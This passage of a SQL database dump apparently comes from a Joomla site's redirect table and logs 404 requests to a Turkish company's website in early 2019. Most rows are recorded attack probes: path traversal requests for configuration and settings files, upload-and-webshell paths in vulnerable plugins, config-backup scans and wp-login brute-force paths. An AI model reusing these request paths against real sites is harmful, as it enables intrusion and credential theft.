00:00:00',301),(21802,'http://3s-technologies.com.tr/tr/\r/jwallpapers_files/plupload/xattacker.php?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:38','0000-00-00 00:00:00',301),(21803,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=izo.php',NULL,'','',1,0,'2019-01-14 05:21:38','0000-00-00 00:00:00',301),(21804,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_redmystic/chart/tmp-upload-images/izo.php',NULL,'','',1,0,'2019-01-14 05:21:39','0000-00-00 00:00:00',301),(21805,'http://3s-technologies.com.tr/tr/\r/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2019-01-14 05:21:39','0000-00-00 00:00:00',301),(21806,'http://3s-technologies.com.tr/tr/\r/components/com_facileforms/libraries/jquery/xattacker.php?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:39','0000-00-00 00:00:00',301),(21807,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2019-01-14 05:21:39','0000-00-00 00:00:00',301),(21808,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/xxb.php',NULL,'','',1,0,'2019-01-14 05:21:39','0000-00-00 00:00:00',301),(21809,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2019-01-14 05:21:40','0000-00-00 00:00:00',301),(21810,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/xxb.php',NULL,'','',1,0,'2019-01-14 05:21:40','0000-00-00 00:00:00',301),(21811,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2019-01-14 05:21:40','0000-00-00 00:00:00',301),(21812,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/xxb.php',NULL,'','',1,0,'2019-01-14 05:21:40','0000-00-00 00:00:00',301),(21813,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2019-01-14 05:21:40','0000-00-00 00:00:00',301),(21814,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_jinc/classes/graphics/tmp-upload-images/xxb.php',NULL,'','',1,0,'2019-01-14 05:21:40','0000-00-00 00:00:00',301),(21815,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2019-01-14 05:21:40','0000-00-00 00:00:00',301),(21816,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/xxb.php',NULL,'','',1,0,'2019-01-14 05:21:41','0000-00-00 00:00:00',301),(21817,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2019-01-14 05:21:41','0000-00-00 00:00:00',301),(21818,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/xxb.php',NULL,'','',1,0,'2019-01-14 05:21:41','0000-00-00 00:00:00',301),(21819,'http://3s-technologies.com.tr/tr/\r/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2019-01-14 05:21:41','0000-00-00 00:00:00',301),(21820,'http://3s-technologies.com.tr/tr/\r/components/com_joomleague/assets/classes//tmp-upload-images/xxb.php',NULL,'','',1,0,'2019-01-14 05:21:41','0000-00-00 00:00:00',301),(21821,'http://3s-technologies.com.tr/tr/\r/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2019-01-14 05:21:41','0000-00-00 00:00:00',301),(21822,'http://3s-technologies.com.tr/tr/\r/modules/mod_dvfoldercontent/download.php?f=li4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',1,0,'2019-01-14 05:21:42','0000-00-00 00:00:00',301),(21823,'http://3s-technologies.com.tr/tr/\r/plugins/content/jw_allvideos/includes/download.php?file=../../../../configuration.php',NULL,'','',1,0,'2019-01-14 05:21:42','0000-00-00 00:00:00',301),(21824,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&itemid=1',NULL,'','',1,0,'2019-01-14 05:21:42','0000-00-00 00:00:00',301),(21825,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',1,0,'2019-01-14 05:21:42','0000-00-00 00:00:00',301),(21826,'http://3s-technologies.com.tr/tr/\r/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2019-01-14 05:21:42','0000-00-00 00:00:00',301),(21827,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&itemid=0',NULL,'','',1,0,'2019-01-14 05:21:42','0000-00-00 00:00:00',301),(21828,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes',NULL,'','',1,0,'2019-01-14 05:21:43','0000-00-00 00:00:00',301),(21829,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',1,0,'2019-01-14 05:21:43','0000-00-00 00:00:00',301),(21830,'http://3s-technologies.com.tr/tr/\r/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php',NULL,'','',1,0,'2019-01-14 05:21:43','0000-00-00 00:00:00',301),(21831,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',1,0,'2019-01-14 05:21:43','0000-00-00 00:00:00',301),(21832,'http://3s-technologies.com.tr/en/ads.txt',NULL,'http://3s-technologies.com.tr/ads.txt','',180,0,'2019-01-14 22:29:50','0000-00-00 00:00:00',301),(21833,'http://3s-technologies.com.tr/tr/wosfbjvkxlmcdmx.html',NULL,'','',1,0,'2019-01-16 05:24:11','0000-00-00 00:00:00',301),(21834,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/krem-lehim',NULL,'','',5,0,'2019-01-18 11:42:27','0000-00-00 00:00:00',301),(21835,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-formgenerator/changelog.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-formgenerator/changelog.txt','',2,0,'2019-01-19 02:19:38','0000-00-00 00:00:00',301),(21836,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri',NULL,'','',8,0,'2019-01-19 10:00:24','0000-00-00 00:00:00',301),(21837,'http://3s-technologies.com.tr/tr/hsnictsrfrmljizu.html',NULL,'','',1,0,'2019-01-21 20:15:05','0000-00-00 00:00:00',301),(21838,'http://3s-technologies.com.tr/en/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2019-01-22 02:34:29','0000-00-00 00:00:00',301),(21839,'http://3s-technologies.com.tr/tr/ups.php',NULL,'http://3s-technologies.com.tr/tr/ups.php','',54,0,'2019-01-22 13:07:03','0000-00-00 00:00:00',301),(21840,'http://3s-technologies.com.tr/en/components/com_weblinks/config.php',NULL,'http://3s-technologies.com.tr/components/com_weblinks/config.php','',2,0,'2019-01-22 15:51:11','0000-00-00 00:00:00',301),(21841,'http://3s-technologies.com.tr/en/ups.php',NULL,'http://3s-technologies.com.tr/ups.php','',29,0,'2019-01-22 15:51:11','0000-00-00 00:00:00',301),(21842,'http://3s-technologies.com.tr/en/components/com_jnews/includes/openflashchart/php-ofc-library/ocf_x_legend.php',NULL,'http://3s-technologies.com.tr/components/com_jnews/includes/openflashchart/php-ofc-library/ocf_x_legend.php','',1,0,'2019-01-23 06:30:40','0000-00-00 00:00:00',301),(21843,'http://3s-technologies.com.tr/en/components/com_jnews/includes/openflashchart/php-ofc-library/ocf_x_legend.php',NULL,'http://3s-technologies.com.tr/components/com_jnews/includes/openflashchart/php-ofc-library/ocf_x_legend.php','',1,0,'2019-01-23 06:30:40','0000-00-00 00:00:00',301),(21844,'http://3s-technologies.com.tr/en/components/com_weblinks/metadata.php',NULL,'http://3s-technologies.com.tr/components/com_weblinks/metadata.php','',2,0,'2019-01-23 06:31:28','0000-00-00 00:00:00',301),(21845,'http://3s-technologies.com.tr/en/awstats',NULL,'','',2,0,'2019-01-24 11:11:21','0000-00-00 00:00:00',301),(21846,'http://3s-technologies.com.tr/en/webstat',NULL,'','',4,0,'2019-01-24 11:11:21','0000-00-00 00:00:00',301),(21847,'http://3s-technologies.com.tr/en/111111111111111111112222cts/',NULL,'http://3s-technologies.com.tr/en/111111111111111111112222cts/','',1,0,'2019-01-26 10:56:22','0000-00-00 00:00:00',301),(21848,'http://3s-technologies.com.tr/tr/admin/wp-login.php',NULL,'http://3s-technologies.com.tr/admin/wp-login.php','',3,0,'2019-01-26 16:41:08','0000-00-00 00:00:00',301),(21849,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer',NULL,'','',7,0,'2019-01-26 18:17:45','0000-00-00 00:00:00',301),(21850,'http://3s-technologies.com.tr/en/administrator/components/com_facileforms/libraries/jquery/tooltip.js',NULL,'http://3s-technologies.com.tr/administrator/components/com_facileforms/libraries/jquery/tooltip.js','',5,0,'2019-01-30 16:02:32','0000-00-00 00:00:00',301),(21851,'http://3s-technologies.com.tr/tr/dcqzwuusfqnjjvv.html',NULL,'','',1,0,'2019-01-30 21:57:22','0000-00-00 00:00:00',301),(21852,'http://3s-technologies.com.tr/en/oihfoe09fposf.php',NULL,'3s-technologies.com.tr','',3,0,'2019-02-02 09:04:03','0000-00-00 00:00:00',301),(21853,'http://3s-technologies.com.tr/tr/configuration.php_',NULL,'','',2,0,'2019-02-02 15:47:07','0000-00-00 00:00:00',301),(21854,'http://3s-technologies.com.tr/tr/configuration.php.in',NULL,'','',1,0,'2019-02-02 15:47:09','0000-00-00 00:00:00',301),(21855,'http://3s-technologies.com.tr/tr/configuration.php.sample',NULL,'','',1,0,'2019-02-02 15:47:10','0000-00-00 00:00:00',301),(21856,'http://3s-technologies.com.tr/tr/configuration.local.php',NULL,'','',1,0,'2019-02-02 15:47:11','0000-00-00 00:00:00',301),(21857,'http://3s-technologies.com.tr/tr/configuration.html',NULL,'','',1,0,'2019-02-02 15:47:12','0000-00-00 00:00:00',301),(21858,'http://3s-technologies.com.tr/tr/configuration.htm',NULL,'','',1,0,'2019-02-02 15:47:13','0000-00-00 00:00:00',301),(21859,'http://3s-technologies.com.tr/tr/configuration.phpn',NULL,'','',1,0,'2019-02-02 15:47:14','0000-00-00 00:00:00',301),(21860,'http://3s-technologies.com.tr/tr/configuration.php~~~~',NULL,'','',1,0,'2019-02-02 15:47:15','0000-00-00 00:00:00',301),(21861,'http://3s-technologies.com.tr/tr/configuration-sample.php.bak',NULL,'','',1,0,'2019-02-02 15:47:17','0000-00-00 00:00:00',301),(21862,'http://3s-technologies.com.tr/tr/configuration.php.backup.txt',NULL,'','',1,0,'2019-02-02 15:47:19','0000-00-00 00:00:00',301),(21863,'http://3s-technologies.com.tr/tr/configuration.php.backup',NULL,'','',2,0,'2019-02-02 15:47:21','0000-00-00 00:00:00',301),(21864,'http://3s-technologies.com.tr/tr/config.txt',NULL,'','',1,0,'2019-02-02 15:47:22','0000-00-00 00:00:00',301),(21865,'http://3s-technologies.com.tr/tr/configuration-sample.php~~',NULL,'','',1,0,'2019-02-02 15:47:24','0000-00-00 00:00:00',301),(21866,'http://3s-technologies.com.tr/tr/configuration.phpo',NULL,'','',1,0,'2019-02-02 15:47:26','0000-00-00 00:00:00',301),(21867,'http://3s-technologies.com.tr/tr/configuration.phpd',NULL,'','',1,0,'2019-02-02 15:47:27','0000-00-00 00:00:00',301),(21868,'http://3s-technologies.com.tr/tr/configuration.phpe',NULL,'','',1,0,'2019-02-02 15:47:28','0000-00-00 00:00:00',301),(21869,'http://3s-technologies.com.tr/tr/configuration.php.com',NULL,'','',1,0,'2019-02-02 15:47:30','0000-00-00 00:00:00',301),(21870,'http://3s-technologies.com.tr/tr/configuration.php.us',NULL,'','',1,0,'2019-02-02 15:47:32','0000-00-00 00:00:00',301),(21871,'http://3s-technologies.com.tr/tr/configuration.php.org',NULL,'','',1,0,'2019-02-02 15:47:34','0000-00-00 00:00:00',301),(21872,'http://3s-technologies.com.tr/tr/configuration.php.uk',NULL,'','',1,0,'2019-02-02 15:47:35','0000-00-00 00:00:00',301),(21873,'http://3s-technologies.com.tr/tr/configuration.php-o',NULL,'','',1,0,'2019-02-02 15:47:38','0000-00-00 00:00:00',301),(21874,'http://3s-technologies.com.tr/tr/bb-config.php.bak',NULL,'','',1,0,'2019-02-02 15:47:40','0000-00-00 00:00:00',301),(21875,'http://3s-technologies.com.tr/tr/configuration.php.resetwp_bak',NULL,'','',1,0,'2019-02-02 15:47:42','0000-00-00 00:00:00',301),(21876,'http://3s-technologies.com.tr/tr/configuration.php1',NULL,'','',1,0,'2019-02-02 15:47:43','0000-00-00 00:00:00',301),(21877,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/flux',NULL,'','',5,0,'2019-02-02 21:53:30','0000-00-00 00:00:00',301),(21878,'http://3s-technologies.com.tr/tr/images/krd.txt',NULL,'','',2,0,'2019-02-02 23:47:35','0000-00-00 00:00:00',301),(21879,'http://3s-technologies.com.tr/tr/images/1998.txt',NULL,'','',3,0,'2019-02-02 23:47:35','0000-00-00 00:00:00',301),(21880,'http://3s-technologies.com.tr/tr/images/sniper.txt',NULL,'','',1,0,'2019-02-02 23:47:35','0000-00-00 00:00:00',301),(21881,'http://3s-technologies.com.tr/tr/images/s.txt',NULL,'','',1,0,'2019-02-02 23:47:35','0000-00-00 00:00:00',301),(21882,'http://3s-technologies.com.tr/tr/wordpress2/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:19','0000-00-00 00:00:00',301),(21883,'http://3s-technologies.com.tr/tr/blog2/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:22','0000-00-00 00:00:00',301),(21884,'http://mail.3s-technologies.com.tr/tr/wordpress2/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:23','0000-00-00 00:00:00',301),(21885,'http://mail.3s-technologies.com.tr/tr/wp2/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:23','0000-00-00 00:00:00',301),(21886,'http://mail.3s-technologies.com.tr/tr/test/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:24','0000-00-00 00:00:00',301),(21887,'http://mail.3s-technologies.com.tr/tr/wordpress/wp-login.php',NULL,'','',2,0,'2019-02-03 05:49:25','0000-00-00 00:00:00',301),(21888,'http://mail.3s-technologies.com.tr/tr/wp/wp-login.php',NULL,'','',2,0,'2019-02-03 05:49:25','0000-00-00 00:00:00',301),(21889,'http://mail.3s-technologies.com.tr/tr/blog3/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:25','0000-00-00 00:00:00',301),(21890,'http://3s-technologies.com.tr/tr/wp2/wp-login.php',NULL,'','',4,0,'2019-02-03 05:49:26','0000-00-00 00:00:00',301),(21891,'http://mail.3s-technologies.com.tr/tr/wp3/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:26','0000-00-00 00:00:00',301),(21892,'http://3s-technologies.com.tr/tr/test3/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:27','0000-00-00 00:00:00',301),(21893,'http://3s-technologies.com.tr/tr/test/wp-login.php',NULL,'','',17,0,'2019-02-03 05:49:27','0000-00-00 00:00:00',301),(21894,'http://mail.3s-technologies.com.tr/tr/blog/wp-login.php',NULL,'','',2,0,'2019-02-03 05:49:27','0000-00-00 00:00:00',301),(21895,'http://mail.3s-technologies.com.tr/tr/test1/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:28','0000-00-00 00:00:00',301),(21896,'http://mail.3s-technologies.com.tr/tr/blog1/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:28','0000-00-00 00:00:00',301),(21897,'http://mail.3s-technologies.com.tr/tr/test2/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:29','0000-00-00 00:00:00',301),(21898,'http://3s-technologies.com.tr/tr/blog3/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:29','0000-00-00 00:00:00',301),(21899,'http://mail.3s-technologies.com.tr/tr/wordpress1/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:30','0000-00-00 00:00:00',301),(21900,'http://3s-technologies.com.tr/tr/test1/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:30','0000-00-00 00:00:00',301),(21901,'http://3s-technologies.com.tr/tr/wp3/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:30','0000-00-00 00:00:00',301),(21902,'http://3s-technologies.com.tr/tr/test2/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:31','0000-00-00 00:00:00',301),(21903,'http://3s-technologies.com.tr/tr/blog1/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:31','0000-00-00 00:00:00',301),(21904,'http://3s-technologies.com.tr/tr/wp1/wp-login.php',NULL,'','',4,0,'2019-02-03 05:49:32','0000-00-00 00:00:00',301),(21905,'http://3s-technologies.com.tr/tr/wordpress3/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:32','0000-00-00 00:00:00',301),(21906,'http://mail.3s-technologies.com.tr/tr/wp1/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:32','0000-00-00 00:00:00',301),(21907,'http://mail.3s-technologies.com.tr/tr/wordpress3/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:33','0000-00-00 00:00:00',301),(21908,'http://mail.3s-technologies.com.tr/tr/test3/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:34','0000-00-00 00:00:00',301),(21909,'http://3s-technologies.com.tr/tr/wordpress1/wp-login.php',NULL,'','',3,0,'2019-02-03 05:49:35','0000-00-00 00:00:00',301),(21910,'http://mail.3s-technologies.com.tr/tr/blog2/wp-login.php',NULL,'','',1,0,'2019-02-03 05:49:35','0000-00-00 00:00:00',301),(21911,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/temp/update_extract/raiz0__ahirk.php',NULL,'','',1,0,'2019-02-04 13:59:25','0000-00-00 00:00:00',301),(21912,'http://3s-technologies.com.tr/tr/wp-content/themes/avada/framework/plugins/revslider/temp/update_extract/revslider/vuln.php?c=vuln.php',NULL,'','',2,0,'2019-02-04 13:59:26','0000-00-00 00:00:00',301),(21913,'http://3s-technologies.com.tr/tr/wp-content/plugins/showbiz/temp/update_extract/raiz0__ahirk.php',NULL,'','',1,0,'2019-02-04 13:59:27','0000-00-00 00:00:00',301),(21914,'http://3s-technologies.com.tr/tr/components/raiz0worm_1549270778.php',NULL,'','',2,0,'2019-02-04 13:59:33','0000-00-00 00:00:00',301),(21915,'http://3s-technologies.com.tr/tr/wp-content/uploads/assignments/raiz0_1549270778.php.',NULL,'','',2,0,'2019-02-04 13:59:34','0000-00-00 00:00:00',301),(21916,'http://3s-technologies.com.tr/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'','',1,0,'2019-02-04 13:59:35','0000-00-00 00:00:00',301),(21917,'http://3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/raiz0__ahirk.php',NULL,'','',1,0,'2019-02-04 13:59:36','0000-00-00 00:00:00',301),(21918,'http://3s-technologies.com.tr/wp-content/plugins/dzs-videogallery/upload.php',NULL,'','',1,0,'2019-02-04 13:59:36','0000-00-00 00:00:00',301),(21919,'http://3s-technologies.com.tr/tr/wp-content/plugins/dzs-videogallery/upload/xo.php',NULL,'','',2,0,'2019-02-04 13:59:37','0000-00-00 00:00:00',301),(21920,'http://3s-technologies.com.tr/wp-admin/admin.php?page=levoslideshow_manage',NULL,'','',1,0,'2019-02-04 13:59:38','0000-00-00 00:00:00',301),(21921,'http://3s-technologies.com.tr/tr/wp-content/uploads/levoslideshow/42_uploadfolder/big/raiz0__ahirk.php',NULL,'','',1,0,'2019-02-04 13:59:38','0000-00-00 00:00:00',301),(21922,'http://3s-technologies.com.tr/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php',NULL,'','',1,0,'2019-02-04 13:59:39','0000-00-00 00:00:00',301),(21923,'http://3s-technologies.com.tr/wp-content/themes/clockstone/theme/functions/uploadbg.php',NULL,'','',1,0,'2019-02-04 13:59:41','0000-00-00 00:00:00',301),(21924,'http://3s-technologies.com.tr/tr/wp-content/themes/clockstone/theme/functions/u3p.php',NULL,'','',2,0,'2019-02-04 13:59:42','0000-00-00 00:00:00',301),(21925,'http://3s-technologies.com.tr/modules/fieldvmegamenu/ajax/upload.php',NULL,'','',1,0,'2019-02-04 13:59:42','0000-00-00 00:00:00',301),(21926,'http://3s-technologies.com.tr/tr/modules/fieldvmegamenu/uploads/attacker.php',NULL,'','',2,0,'2019-02-04 13:59:43','0000-00-00 00:00:00',301),(21927,'http://3s-technologies.com.tr/wp-content/plugins/tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php',NULL,'','',1,0,'2019-02-04 13:59:43','0000-00-00 00:00:00',301),(21928,'http://3s-technologies.com.tr/tr/wp-content/themes/directory/images/tmp/raiz0__ahirk.php',NULL,'','',1,0,'2019-02-04 13:59:44','0000-00-00 00:00:00',301),(21929,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/u3p.php',NULL,'','',2,0,'2019-02-04 13:59:45','0000-00-00 00:00:00',301),(21930,'http://3s-technologies.com.tr/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php?year=2018&month=01',NULL,'','',1,0,'2019-02-04 13:59:46','0000-00-00 00:00:00',301),(21931,'http://3s-technologies.com.tr/tr/wp-content/uploads/2018/01/raiz0__ahirk.php',NULL,'','',1,0,'2019-02-04 13:59:46','0000-00-00 00:00:00',301),(21932,'http://3s-technologies.com.tr/tr/assets/ckeditor/kcfinder/upload/files/attacker.php',NULL,'','',2,0,'2019-02-04 13:59:52','0000-00-00 00:00:00',301),(21933,'http://3s-technologies.com.tr/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/',NULL,'','',1,0,'2019-02-04 13:59:52','0000-00-00 00:00:00',301),(21934,'http://3s-technologies.com.tr/tr/modules/attacker.php',NULL,'','',2,0,'2019-02-04 13:59:53','0000-00-00 00:00:00',301),(21935,'http://3s-technologies.com.tr/modules/namemodule/uploadimage.php',NULL,'','',1,0,'2019-02-04 13:59:53','0000-00-00 00:00:00',301),(21936,'http://3s-technologies.com.tr/tr/modules/homepageadvertise2/slides/raiz0.php',NULL,'','',2,0,'2019-02-04 13:59:54','0000-00-00 00:00:00',301),(21937,'http://3s-technologies.com.tr/tr/media/raiz0.php',NULL,'','',2,0,'2019-02-04 13:59:55','0000-00-00 00:00:00',301),(21938,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/raiz0worm.php3.g?raiz0',NULL,'','',2,0,'2019-02-04 13:59:56','0000-00-00 00:00:00',301),(21939,'http://3s-technologies.com.tr/tr/u.php',NULL,'','',46,0,'2019-02-04 13:59:58','0000-00-00 00:00:00',301),(21940,'http://3s-technologies.com.tr/tr/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../sites/default/settings.php',NULL,'','',2,0,'2019-02-04 13:59:58','0000-00-00 00:00:00',301),(21941,'http://3s-technologies.com.tr//wp-admin/admin-ajax.php',NULL,'','',8,0,'2019-02-04 13:59:59','0000-00-00 00:00:00',301),(21942,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/temp/update_extract/raiz0__xdnqj.php',NULL,'','',1,0,'2019-02-04 13:59:59','0000-00-00 00:00:00',301),(21943,'http://3s-technologies.com.tr/tr/wp-content/plugins/showbiz/temp/update_extract/raiz0__xdnqj.php',NULL,'','',1,0,'2019-02-04 14:00:03','0000-00-00 00:00:00',301),(21944,'http://3s-technologies.com.tr//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../raiz0worm_1549270778.php',NULL,'','',1,0,'2019-02-04 14:00:10','0000-00-00 00:00:00',301),(21945,'http://3s-technologies.com.tr//wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'','',1,0,'2019-02-04 14:00:12','0000-00-00 00:00:00',301),(21946,'http://3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/raiz0__xdnqj.php',NULL,'','',1,0,'2019-02-04 14:00:13','0000-00-00 00:00:00',301),(21947,'http://3s-technologies.com.tr//wp-content/plugins/dzs-videogallery/upload.php',NULL,'','',1,0,'2019-02-04 14:00:13','0000-00-00 00:00:00',301),(21948,'http://3s-technologies.com.tr//wp-admin/admin.php?page=levoslideshow_manage',NULL,'','',1,0,'2019-02-04 14:00:15','0000-00-00 00:00:00',301),(21949,'http://3s-technologies.com.tr/tr/wp-content/uploads/levoslideshow/42_uploadfolder/big/raiz0__xdnqj.php',NULL,'','',1,0,'2019-02-04 14:00:16','0000-00-00 00:00:00',301),(21950,'http://3s-technologies.com.tr//wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php',NULL,'','',1,0,'2019-02-04 14:00:16','0000-00-00 00:00:00',301),(21951,'http://3s-technologies.com.tr//wp-content/themes/clockstone/theme/functions/uploadbg.php',NULL,'','',1,0,'2019-02-04 14:00:18','0000-00-00 00:00:00',301),(21952,'http://3s-technologies.com.tr//modules/fieldvmegamenu/ajax/upload.php',NULL,'','',1,0,'2019-02-04 14:00:19','0000-00-00 00:00:00',301),(21953,'http://3s-technologies.com.tr//wp-content/plugins/tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php',NULL,'','',1,0,'2019-02-04 14:00:20','0000-00-00 00:00:00',301),(21954,'http://3s-technologies.com.tr/tr/wp-content/themes/directory/images/tmp/raiz0__xdnqj.php',NULL,'','',1,0,'2019-02-04 14:00:21','0000-00-00 00:00:00',301),(21955,'http://3s-technologies.com.tr//wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php?year=2018&month=01',NULL,'','',1,0,'2019-02-04 14:00:23','0000-00-00 00:00:00',301),(21956,'http://3s-technologies.com.tr/tr/wp-content/uploads/2018/01/raiz0__xdnqj.php',NULL,'','',1,0,'2019-02-04 14:00:23','0000-00-00 00:00:00',301),(21957,'http://3s-technologies.com.tr//assets/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2019-02-04 14:00:24','0000-00-00 00:00:00',301),(21958,'http://3s-technologies.com.tr//modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/',NULL,'','',1,0,'2019-02-04 14:00:25','0000-00-00 00:00:00',301),(21959,'http://3s-technologies.com.tr//modules/namemodule/uploadimage.php',NULL,'','',1,0,'2019-02-04 14:00:26','0000-00-00 00:00:00',301),(21960,'http://3s-technologies.com.tr//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_uploadraiz0.php',NULL,'','',1,0,'2019-02-04 14:00:27','0000-00-00 00:00:00',301),(21961,'http://3s-technologies.com.tr//user/register?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'','',1,0,'2019-02-04 14:00:29','0000-00-00 00:00:00',301),(21962,'http://3s-technologies.com.tr/en/jwlsjd_baaqifg.php',NULL,'3s-technologies.com.tr','',2,0,'2019-02-04 16:50:58','0000-00-00 00:00:00',301),(21963,'http://www.3s-technologies.com.tr/tr/wp-admin/admin-ajax.php',NULL,'','',11,0,'2019-02-05 18:03:59','0000-00-00 00:00:00',301),(21964,'https://www.3s-technologies.com.tr/tr/administrator/xml.php',NULL,'','',1,0,'2019-02-06 03:23:51','0000-00-00 00:00:00',301),(21965,'http://3s-technologies.com.tr/tr/rss/catalog/notifystock',NULL,'http://3s-technologies.com.tr/rss/catalog/notifystock/','',4,0,'2019-02-06 15:19:34','0000-00-00 00:00:00',301),(21966,'http://3s-technologies.com.tr/tr/phpmyadmin',NULL,'','',14,0,'2019-02-06 16:48:36','0000-00-00 00:00:00',301),(21967,'http://3s-technologies.com.tr/tr/myadmin',NULL,'','',1,0,'2019-02-06 16:48:37','0000-00-00 00:00:00',301),(21968,'http://3s-technologies.com.tr/tr/pma',NULL,'','',4,0,'2019-02-06 16:48:37','0000-00-00 00:00:00',301),(21969,'http://3s-technologies.com.tr/tr/qtlyomkpoegtxu.html',NULL,'','',1,0,'2019-02-07 01:08:03','0000-00-00 00:00:00',301),(21970,'http://mail.3s-technologies.com.tr/tr/imp/test.php',NULL,'','',6,0,'2019-02-09 19:16:27','0000-00-00 00:00:00',301),(21971,'http://mail.3s-technologies.com.tr/tr/horde/imp/test.php',NULL,'','',6,0,'2019-02-09 19:16:28','0000-00-00 00:00:00',301),(21972,'http://mail.3s-technologies.com.tr/tr/horde3/imp/test.php',NULL,'','',6,0,'2019-02-09 19:16:29','0000-00-00 00:00:00',301),(21973,'http://3s-technologies.com.tr/tr/horde/imp/test.php',NULL,'','',6,0,'2019-02-13 10:38:31','0000-00-00 00:00:00',301),(21974,'http://3s-technologies.com.tr/tr/horde3/imp/test.php',NULL,'','',1,0,'2019-02-13 10:38:32','0000-00-00 00:00:00',301),(21975,'http://3s-technologies.com.tr/tr/imp/test.php',NULL,'','',1,0,'2019-02-13 10:38:33','0000-00-00 